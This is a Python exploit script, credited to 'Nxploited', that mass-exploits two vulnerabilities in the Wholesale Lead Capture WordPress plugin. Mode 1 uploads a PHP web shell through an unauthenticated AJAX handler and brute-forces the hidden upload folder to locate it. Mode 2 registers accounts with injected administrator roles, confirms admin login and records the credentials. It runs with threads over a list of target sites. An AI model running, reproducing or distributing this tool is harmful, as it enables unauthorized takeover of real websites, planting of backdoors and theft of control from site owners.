#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ By: Nxploited (Khaled Alenazi) GitHub: https://github.com/Nxploited Telegram: @KNxploited """ import os import re import sys import time import json import random from concurrent.futures import ThreadPoolExecutor, as_completed from typing import Optional, List, Tuple, Dict, Any from urllib.parse import urlparse import requests import urllib3 try: from colorama import Fore, Style, init as colorama_init # type: ignore colorama_init(autoreset=True) except Exception: class _C: RESET = "" RED = "" GREEN = "" YELLOW = "" CYAN = "" MAGENTA = "" BLUE = "" WHITE = "" Fore = _C() Style = _C() urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) requests.packages.urllib3.disable_warnings() def log_success(msg: str) -> None: print(Fore.GREEN + Style.BRIGHT + "[SUCCESS] " + Style.NORMAL + msg + Style.RESET_ALL) def log_fail(msg: str) -> None: print(Fore.RED + Style.BRIGHT + "[FAIL] " + Style.NORMAL + msg + Style.RESET_ALL) def log_dead(msg: str) -> None: print(Fore.LIGHTBLACK_EX + Style.BRIGHT + "[DEAD] " + Style.NORMAL + msg + Style.RESET_ALL) def log_info(msg: str) -> None: print(Fore.CYAN + Style.BRIGHT + "[INFO] " + Style.NORMAL + msg + Style.RESET_ALL) def log_warn(msg: str) -> None: print(Fore.MAGENTA + Style.BRIGHT + "[WARN] " + Style.NORMAL + msg + Style.RESET_ALL) def build_session(timeout: int) -> requests.Session: s = requests.Session() s.verify = False s.headers.update({ "User-Agent": ( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/121.0.0.0 Safari/537.36" ), "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.9", "Connection": "keep-alive", }) adapter = requests.adapters.HTTPAdapter(pool_connections=50, pool_maxsize=50, max_retries=1) s.mount("http://", adapter) s.mount("https://", adapter) return s def normalize_base(url: str) -> str: url = url.strip() if not url.startswith(("http://", "https://")): url = "http://" + url p = urlparse(url) return f"{p.scheme}://{p.netloc}" def guess_uploads_base_url(base_url: str) -> str: return base_url.rstrip("/") + "/wp-content/uploads" def ask(prompt: str, default: Optional[str] = None) -> str: if default is not None: s = input(f"{prompt} [{default}]: ").strip() return s if s else default return input(f"{prompt}: ").strip() def ask_int(prompt: str, default: int) -> int: s = ask(prompt, str(default)) try: return int(s) except Exception: return default def center(text: str, width: int) -> str: if len(text) >= width: return text pad = (width - len(text)) // 2 return " " * pad + text def print_banner() -> None: os.system("cls" if os.name == "nt" else "clear") try: import shutil TERM_WIDTH = shutil.get_terminal_size((80, 20)).columns except Exception: TERM_WIDTH = 80 top_border = "─" * (TERM_WIDTH - 2) bottom_border = top_border print(Fore.BLUE + "┌" + top_border + "┐" + Style.RESET_ALL) raw_logo = [ ] for line in raw_logo: print(Fore.CYAN + Style.BRIGHT + center(line, TERM_WIDTH) + Style.RESET_ALL) print() cve1 = "CVE-2026-27542 Unauthenticated Privilege Escalation" cve2 = "CVE-2026-27540 Unauthenticated Arbitrary File Upload" print(Style.BRIGHT + Fore.GREEN + center(cve1, TERM_WIDTH) + Style.RESET_ALL) print(Style.BRIGHT + Fore.GREEN + center(cve2, TERM_WIDTH) + Style.RESET_ALL) print() by_line = "By: Nxploited (Khaled Alenazi)" gh_line = "GitHub : https://github.com/Nxploited" tg_line = "Telegram : @KNxploited" print(Style.BRIGHT + Fore.GREEN + center(by_line, TERM_WIDTH) + Style.RESET_ALL) print(Style.BRIGHT + Fore.GREEN + center(gh_line.upper(), TERM_WIDTH) + Style.RESET_ALL) print(Style.BRIGHT + Fore.GREEN + center(tg_line.upper(), TERM_WIDTH) + Style.RESET_ALL) print() modes_title = "Modes" print(Style.BRIGHT + Fore.CYAN + center(modes_title, TERM_WIDTH) + Style.RESET_ALL) print(Fore.WHITE + center("[1] File Upload + wwlc-temp-* Folder Brute-Force", TERM_WIDTH) + Style.RESET_ALL) print(Fore.WHITE + center("[2] Registration + Role Injection + Admin Check", TERM_WIDTH) + Style.RESET_ALL) print() note = ( "Note (Mode 1): wwlc-temp-* folder is generated via uniqid('wwlc-temp-'), " "so folder name is brute-forced, not exactly computed." ) print(Fore.YELLOW + center(note, TERM_WIDTH) + Style.RESET_ALL) print(Fore.BLUE + "└" + bottom_border + "┘" + Style.RESET_ALL) print() def has_logged_in_cookie(sess: requests.Session) -> bool: return any(c.name.startswith("wordpress_logged_in") for c in sess.cookies) def check_admin_access(sess: requests.Session, root_url: str, timeout: int) -> bool: admin_paths = [ "/wp-admin/index.php", "/wp-admin/profile.php", "/wp-admin/edit.php", "/wp-admin/plugins.php", "/wp-admin/users.php", ] markers = [ 'id="adminmenu"', 'id="wpadminbar"', '
', 'class="wp-admin', 'id="wpcontent"', 'id="wpbody-content"', "users.php", "plugins.php", "edit.php", ] deny = [ "sorry, you are not allowed to access this page", "you do not have sufficient permissions", "insufficient permissions", ] ok_pages = 0 for ep in admin_paths: u = root_url.rstrip("/") + ep try: r = sess.get(u, timeout=timeout, allow_redirects=True) except Exception: continue if r.status_code != 200: continue if "wp-login.php" in (r.url or ""): return False content = r.text or "" low = content.lower() if any(d in low for d in deny): return False found = sum(1 for m in markers if m in content) if found >= 3: ok_pages += 1 if ok_pages >= 2: return True try: r2 = sess.get(root_url.rstrip("/") + "/wp-admin/plugin-install.php", timeout=timeout, allow_redirects=True) if r2.status_code == 200: low2 = (r2.text or "").lower() if any(d in low2 for d in deny): return False if "upload-plugin" in low2 or "plugin-install-tab" in low2: return True except Exception: pass return ok_pages >= 1 def find_wp_login_path(sess: requests.Session, base_url: str, timeout: int) -> str: paths = [ "/wp-login.php", "/wordpress/wp-login.php", "/wp/wp-login.php", "/blog/wp-login.php", "/cms/wp-login.php", "/wp/login.php", ] for p in paths: url = base_url.rstrip("/") + p try: r = sess.get(url, timeout=timeout, allow_redirects=True) except Exception: continue txt = r.text or "" if r.status_code == 200 and " bool: root_site = base_url.rstrip("/") + "/" login_path = find_wp_login_path(sess, base_url, timeout) login_url = base_url.rstrip("/") + login_path try: sess.get(login_url, timeout=timeout, allow_redirects=True) except Exception: pass data = { "log": login_user.strip(), "pwd": password, "wp-submit": "Log In", "testcookie": "1", } headers = { "User-Agent": sess.headers.get("User-Agent", ""), "Content-Type": "application/x-www-form-urlencoded", "Referer": login_url, } try: r = sess.post(login_url, data=data, headers=headers, timeout=timeout, allow_redirects=True) except Exception: return False content = (r.text or "").lower() fails = [ "incorrect username or password", "invalid username", "invalid password", "error: the username", "is not registered", "authentication failed", "login failed", "unknown username", ] if any(x in content for x in fails): return False if not has_logged_in_cookie(sess): return False return check_admin_access(sess, root_site, timeout) # ===================== MODE 1: UPLOAD + FOLDER BRUTE FORCE (محسّن) ===================== # def upload_shell( sess: requests.Session, base_url: str, shell_path: str, timeout: int, ) -> Tuple[bool, Optional[str], Optional[float], Optional[float]]: ajax_url = base_url.rstrip("/") + "/wp-admin/admin-ajax.php" if not os.path.isfile(shell_path): log_fail(f"{base_url} | shell file not found: {shell_path}") return False, None, None, None files = { "uploaded_file": (os.path.basename(shell_path), open(shell_path, "rb"), "application/octet-stream") } data = { "action": "wwlc_file_upload_handler", "file_settings": json.dumps({ "allowed_file_types": ["php", "jpg"], "max_allowed_file_size": 99999999 }) } t_before = time.time() try: r = sess.post(ajax_url, data=data, files=files, timeout=timeout) except Exception as e: log_dead(f"{base_url} | upload error (site may be down): {e}") return False, None, t_before, None t_after = time.time() upload_duration = t_after - t_before log_info(f"{base_url} | upload HTTP time: {upload_duration:.3f}s") text = r.text or "" try: j = json.loads(text) except Exception: log_fail(f"{base_url} | upload non-JSON response snippet: {text[:150]!r}") return False, None, t_before, t_after if not isinstance(j, dict): log_fail(f"{base_url} | upload JSON not object: {text[:150]!r}") return False, None, t_before, t_after status = str(j.get("status", "")).lower() if status != "success": log_fail(f"{base_url} | upload failed JSON: {j}") return False, None, t_before, t_after file_name = j.get("file_name") if not file_name: log_fail(f"{base_url} | upload success but no file_name in response") return False, None, t_before, t_after log_success(f"{base_url} | upload success file_name={file_name}") return True, file_name, t_before, t_after def try_list_uploads( sess: requests.Session, uploads_base: str, timeout: int, ) -> List[str]: candidates: List[str] = [] url = uploads_base.rstrip("/") + "/" try: r = sess.get(url, timeout=timeout, allow_redirects=True) except Exception: return candidates if r.status_code not in (200, 403): return candidates body = r.text or "" lower = body.lower() if "index of" in lower and "wp-content/uploads" in lower: import re for m in re.finditer(r'href=["\'](wwlc-temp-[^/"\' ]+/?)["\']', body, re.I): name = m.group(1).rstrip("/") candidates.append(name) return list(dict.fromkeys(candidates)) def random_hex(n: int) -> str: return "".join(random.choice("0123456789abcdef") for _ in range(n)) def generate_pattern_guesses(max_pattern_guesses: int) -> List[str]: guesses: List[str] = [] now = time.localtime() ymd = time.strftime("%Y%m%d", now) ymdh = time.strftime("%Y%m%d%H", now) ymdhm = time.strftime("%Y%m%d%H%M", now) time_patterns = [ f"wwlc-temp-{ymd}", f"wwlc-temp-{ymdh}", f"wwlc-temp-{ymdhm}", ] guesses.extend(time_patterns) hex_targets = max(20, max_pattern_guesses // 3) for _ in range(hex_targets): for ln in (10, 11, 12, 13, 14, 15, 16): if len(guesses) >= max_pattern_guesses: break guesses.append("wwlc-temp-" + random_hex(ln)) if len(guesses) >= max_pattern_guesses: break seq_limit = min(50000, max_pattern_guesses - len(guesses)) for i in range(1, seq_limit + 1): guesses.append(f"wwlc-temp-{i:010d}") if len(guesses) >= max_pattern_guesses: break return list(dict.fromkeys(guesses)) def generate_time_based_hex_guesses( t_before: Optional[float], t_after: Optional[float], count: int, ) -> List[str]: if t_before is None or t_after is None or count <= 0: return [] seed_str = f"{t_before:.6f}-{t_after:.6f}" seed = hash(seed_str) rnd = random.Random(seed) guesses = [] for _ in range(count): ln = rnd.choice([12, 13, 14]) hex_part = "".join(rnd.choice("0123456789abcdef") for _ in range(ln)) guesses.append("wwlc-temp-" + hex_part) return guesses def generate_random_hex_guesses(count: int) -> List[str]: return ["wwlc-temp-" + random_hex(13) for _ in range(count)] def try_shell_at( sess: requests.Session, url: str, shell_signature: str, timeout: int, ) -> bool: try: r = sess.get(url, timeout=timeout, allow_redirects=True) except Exception: return False if r.status_code != 200: return False body = r.text or "" if shell_signature in body: return True return False def try_locate_shell( sess: requests.Session, base_url: str, file_name: str, shell_signature: str, max_pattern_guesses: int, max_random_guesses: int, max_time_based_guesses: int, t_before: Optional[float], t_after: Optional[float], timeout: int, ) -> Optional[str]: uploads_base = guess_uploads_base_url(base_url) total_attempts = 0 t_scan_start = time.time() # Layer 0: directory listing dl_folders = try_list_uploads(sess, uploads_base, timeout) if dl_folders: log_info(f"{base_url} | directory listing: {len(dl_folders)} wwlc-temp-* candidates") for folder in dl_folders: url = f"{uploads_base.rstrip('/')}/{folder}/{file_name}" total_attempts += 1 if try_shell_at(sess, url, shell_signature, timeout): t_scan_end = time.time() scan_time = t_scan_end - t_scan_start rate = total_attempts / scan_time if scan_time > 0 else total_attempts log_success(f"{base_url} | shell FOUND via listing: {url}") log_info(f"{base_url} | folder scan stats: attempts={total_attempts}, time={scan_time:.3f}s, rate={rate:.1f} req/s") return url # Layer 1: pattern-based pattern_guesses = generate_pattern_guesses(max_pattern_guesses) total_patterns = len(pattern_guesses) log_info(f"{base_url} | pattern brute-force ({total_patterns} guesses)") for idx, g in enumerate(pattern_guesses, start=1): url = f"{uploads_base.rstrip('/')}/{g}/{file_name}" total_attempts += 1 if try_shell_at(sess, url, shell_signature, timeout): t_scan_end = time.time() scan_time = t_scan_end - t_scan_start rate = total_attempts / scan_time if scan_time > 0 else total_attempts log_success(f"{base_url} | shell FOUND via pattern: {url}") log_info(f"{base_url} | folder scan stats: attempts={total_attempts}, time={scan_time:.3f}s, rate={rate:.1f} req/s") return url if idx % 200 == 0: log_info(f"{base_url} | pattern guesses: {idx}/{total_patterns}") # Layer 2: time-based if max_time_based_guesses > 0: tb_guesses = generate_time_based_hex_guesses(t_before, t_after, max_time_based_guesses) total_tb = len(tb_guesses) log_info(f"{base_url} | time-based hex brute-force ({total_tb} guesses)") for idx, g in enumerate(tb_guesses, start=1): url = f"{uploads_base.rstrip('/')}/{g}/{file_name}" total_attempts += 1 if try_shell_at(sess, url, shell_signature, timeout): t_scan_end = time.time() scan_time = t_scan_end - t_scan_start rate = total_attempts / scan_time if scan_time > 0 else total_attempts log_success(f"{base_url} | shell FOUND via time-based hex: {url}") log_info(f"{base_url} | folder scan stats: attempts={total_attempts}, time={scan_time:.3f}s, rate={rate:.1f} req/s") return url if idx % 200 == 0: log_info(f"{base_url} | time-based guesses: {idx}/{total_tb}") # Layer 3: random if max_random_guesses > 0: random_guesses = generate_random_hex_guesses(max_random_guesses) log_info(f"{base_url} | random hex brute-force ({max_random_guesses} guesses)") for idx, g in enumerate(random_guesses, start=1): url = f"{uploads_base.rstrip('/')}/{g}/{file_name}" total_attempts += 1 if try_shell_at(sess, url, shell_signature, timeout): t_scan_end = time.time() scan_time = t_scan_end - t_scan_start rate = total_attempts / scan_time if scan_time > 0 else total_attempts log_success(f"{base_url} | shell FOUND via random hex: {url}") log_info(f"{base_url} | folder scan stats: attempts={total_attempts}, time={scan_time:.3f}s, rate={rate:.1f} req/s") return url if idx % 500 == 0: log_info(f"{base_url} | random guesses: {idx}/{max_random_guesses}") t_scan_end = time.time() scan_time = t_scan_end - t_scan_start rate = total_attempts / scan_time if scan_time > 0 else total_attempts log_warn(f"{base_url} | folder scan finished, NOT found (attempts={total_attempts}, time={scan_time:.3f}s, rate={rate:.1f} req/s)") return None def process_site_mode1( site: str, shell_path: str, shell_signature: str, timeout: int, max_pattern_guesses: int, max_random_guesses: int, max_time_based_guesses: int, results_file: str, found_file: str, ) -> None: base_url = normalize_base(site) log_info(f"Mode1 | Target: {base_url}") sess = build_session(timeout) ok, file_name, t_before, t_after = upload_shell(sess, base_url, shell_path, timeout) if not ok or not file_name: return os.makedirs(os.path.dirname(results_file), exist_ok=True) with open(results_file, "a", encoding="utf-8") as f: f.write(f"{base_url} upload_success file_name={file_name}\n") found_url = try_locate_shell( sess, base_url, file_name, shell_signature, max_pattern_guesses, max_random_guesses, max_time_based_guesses, t_before, t_after, timeout, ) if found_url: os.makedirs(os.path.dirname(found_file), exist_ok=True) with open(found_file, "a", encoding="utf-8") as ff: ff.write(f"{base_url} shell_url={found_url}\n") # ===================== MODE 2: REGISTRATION + ROLE INJECTION (كما هو) ===================== # WWLC_FORM_PATHS = [ "/", "/register/", "/registration/", "/signup/", "/sign-up/", "/account/", "/my-account/", "/my-account/register/", "/my-account/registration/", "/user/register/", "/user/registration/", "/wholesale-register/", "/wholesale-registration/", "/wholesale-signup/", "/wholesale-lead/", "/wwlc-register/", "/wwlc-registration/", "/wholesale-account/", "/customer-register/", "/customer-registration/", ] def discover_wwlc_form( sess: requests.Session, base_url: str, timeout: int, ) -> Dict[str, Any]: profile: Dict[str, Any] = {"nonce": None} visited = set() for p in WWLC_FORM_PATHS: url = base_url.rstrip("/") + p if url in visited: continue visited.add(url) try: r = sess.get(url, timeout=timeout, allow_redirects=True) except Exception: continue if r.status_code != 200 or not r.text: continue body = r.text if "wwlc_register_user_nonce_field" not in body and "wwlc_registration_form" not in body: continue m = re.search( r']+(?:name|id)=["\']wwlc_register_user_nonce_field["\'][^>]*value=["\']([^"\']+)["\']', body, re.I, ) if m: nonce_val = m.group(1).strip() if nonce_val: profile["nonce"] = nonce_val log_success(f"{base_url} | nonce found on {p}: {nonce_val}") return profile log_warn(f"{base_url} | WWLC nonce not found on common registration paths") return profile def wwlc_create_user_request( sess: requests.Session, base_url: str, first_name: str, last_name: str, email: str, username: str, phone: str, address: str, company: str, password: str, nonce: Optional[str], timeout: int, ) -> Tuple[str, Dict[str, Any]]: ajax_url = base_url.rstrip("/") + "/wp-admin/admin-ajax.php?action=wwlc_create_user" data: Dict[str, str] = { "user_data[first_name]": first_name, "user_data[last_name]": last_name, "user_data[user_email]": email, "user_data[wwlc_username]": username, "user_data[wwlc_phone]": phone, "user_data[wwlc_address]": address, "user_data[wwlc_company_name]": company, "user_data[wwlc_auto_approve]": "true", "user_data[wwlc_auto_login]": "true", "user_data[wwlc_password]": password, "user_data[wwlc_password_confirm]": password, "user_data[wp_capabilities][administrator]": "1", "user_data[wp_user_level]": "10", "user_data[_wp_capabilities][administrator]": "1", "user_data[wwlc_custom_set_role]": "administrator", } if nonce: data["wwlc_register_user_nonce_field"] = nonce headers = { "User-Agent": sess.headers.get("User-Agent", ""), "Content-Type": "application/x-www-form-urlencoded", } try: r = sess.post(ajax_url, data=data, headers=headers, timeout=timeout) except Exception as e: return "error", {"error": str(e)} text = r.text or "" try: j = json.loads(text) if not isinstance(j, dict): return "non_json", {"raw": text} except Exception: return "non_json", {"raw": text} status = str(j.get("status", "")).lower() return status, j def process_site_mode2( site: str, base_username: str, base_email: str, password: str, timeout: int, results_file: str, admin_file: str, ) -> None: base_url = normalize_base(site) log_info(f"Mode2 | Target: {base_url}") sess = build_session(timeout) profile = discover_wwlc_form(sess, base_url, timeout) nonce = profile.get("nonce") if nonce: log_info(f"{base_url} | using discovered nonce") else: log_warn(f"{base_url} | sending request WITHOUT nonce (may fail security)") rnd = "".join(random.choice("abcdefghijklmnopqrstuvwxyz0123456789") for _ in range(4)) username = f"{base_username}_{rnd}" if "@" in base_email: local, dom = base_email.split("@", 1) email = f"{local}+{rnd}@{dom}" else: email = base_email first_name = "Test" last_name = "User" phone = "000000" address = "WWLC Address" company = "WWLC Company" status, resp = wwlc_create_user_request( sess, base_url, first_name, last_name, email, username, phone, address, company, password, nonce, timeout, ) os.makedirs(os.path.dirname(results_file), exist_ok=True) with open(results_file, "a", encoding="utf-8") as f: f.write( f"{base_url} wwlc_create_user status={status} " f"user={username} email={email} pass={password} resp={json.dumps(resp)}\n" ) if status != "success": log_fail(f"{base_url} | registration failed or not success") return log_success(f"{base_url} | registration success for user={username}") login_user = username sess_login = build_session(timeout) if strict_login_attempt(sess_login, base_url, login_user, password, timeout): log_success(f"{base_url} | ADMIN login confirmed as {login_user}") os.makedirs(os.path.dirname(admin_file), exist_ok=True) with open(admin_file, "a", encoding="utf-8") as af: af.write( f"{base_url} admin_login_ok user={login_user} " f"email={email} pass={password}\n" ) else: log_warn(f"{base_url} | registration success but admin login FAILED for {login_user}") def main() -> None: print_banner() mode = ask_int("Select mode [1=Upload+Folder, 2=Registration+Admin]", 1) url_list_file = ask("Targets list file (one URL per line)", "list.txt") if not os.path.exists(url_list_file): log_fail(f"Targets file not found: {url_list_file}") return threads = ask_int("Threads (concurrent sites)", 3) timeout = ask_int("HTTP timeout (seconds)", 10) with open(url_list_file, "r", encoding="utf-8", errors="ignore") as f: targets = [line.strip() for line in f if line.strip()] if not targets: log_fail("Targets file is empty") return if mode == 1: shell_path = ask("Shell file path", "shell.php") shell_signature = ask("Shell signature (marker inside shell)", "Nx_SHELL_SIGNATURE") max_pattern_guesses = ask_int("Max pattern-based folder guesses per site", 50000) max_time_based_guesses = ask_int("Max time-based folder guesses per site", 50000) max_random_guesses = ask_int("Max random-hex folder guesses per site", 100000) results_file = ask("Upload results file", "scan_results/wwlc_uploads.txt") found_file = ask("Found shells file", "scan_results/wwlc_shells_found.txt") log_info(f"Loaded {len(targets)} targets | MODE 1 (Upload+Folder)") print() with ThreadPoolExecutor(max_workers=threads) as executor: futures = [ executor.submit( process_site_mode1, site, shell_path, shell_signature, timeout, max_pattern_guesses, max_random_guesses, max_time_based_guesses, results_file, found_file, ) for site in targets ] try: for _ in as_completed(futures): pass except KeyboardInterrupt: log_fail("Interrupted by user, cancelling tasks...") executor.shutdown(wait=False, cancel_futures=True) log_success(f"MODE 1 finished | results={results_file} | shells={found_file}") else: base_username = ask("Base registration username (prefix)", "Nx_admin") base_email = ask("Base registration email", "nx_admin@example.com") password = "Nx_admin123@!SA" log_info(f"Registration password is FIXED: {password}") results_file = ask("Registration results file", "scan_results/wwlc_register_results.txt") admin_file = ask("Admin hits file", "scan_results/Admin_login.txt") log_info(f"Loaded {len(targets)} targets | MODE 2 (Registration+Admin)") print() with ThreadPoolExecutor(max_workers=threads) as executor: futures = [ executor.submit( process_site_mode2, site, base_username, base_email, password, timeout, results_file, admin_file, ) for site in targets ] try: for _ in as_completed(futures): pass except KeyboardInterrupt: log_fail("Interrupted by user, cancelling tasks...") executor.shutdown(wait=False, cancel_futures=True) log_success(f"MODE 2 finished | results={results_file} | admin_hits={admin_file}") if __name__ == "__main__": main()